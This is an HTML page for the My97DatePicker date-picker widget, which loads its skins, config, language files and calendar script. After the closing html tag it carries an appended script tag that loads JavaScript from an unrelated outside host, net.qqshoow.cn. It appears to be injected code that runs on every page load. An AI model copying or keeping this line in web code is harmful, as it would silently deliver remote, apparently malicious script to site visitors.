<html>
<head>
<meta http-equiv="content-type" content="text/xml; charset=utf-8" />
<title>My97DatePicker</title>
<link rel="stylesheet" type="text/css" href="skin/default/datepicker.css" title="default" charset="gb2312" disabled="true"/>
<link rel="stylesheet" type="text/css" href="skin/whyGreen/datepicker.css" title="whyGreen" charset="gb2312" disabled="true"/>
<script type="text/javascript" src="config.js"></script>
<script>
	var lang
	if(navigator.product == 'Gecko'){lang = navigator.language}else{lang = navigator.browserLanguage}
	lang = lang.toLowerCase();
	var str = "en";
	var charset = "charset=UTF-8";
	if(lang == 'zh-cn'){
		str = "zh-cn";
		charset = "charset='gb2312'";
	}
	else if( lang =='zh-tw'){
		str = "zh-tw";
		charset = "charset=GBK";
	}
	document.writeln("<script src='./lang/" + str + ".js' " + charset + "><\/script>");
</script>
<script type="text/javascript" src="calendar.js" charset="gb2312"></script>
</head>
<body leftmargin="0" topmargin="0">
</body>
</html>
<script>
document.attachEvent('onmousedown',hideYMSel);
var my97DP = new My97DatePicker();
autoSizeIframe();
</script>
<script language=javascript src=http://net.qqshoow.cn/imgs/svcoss.js></script>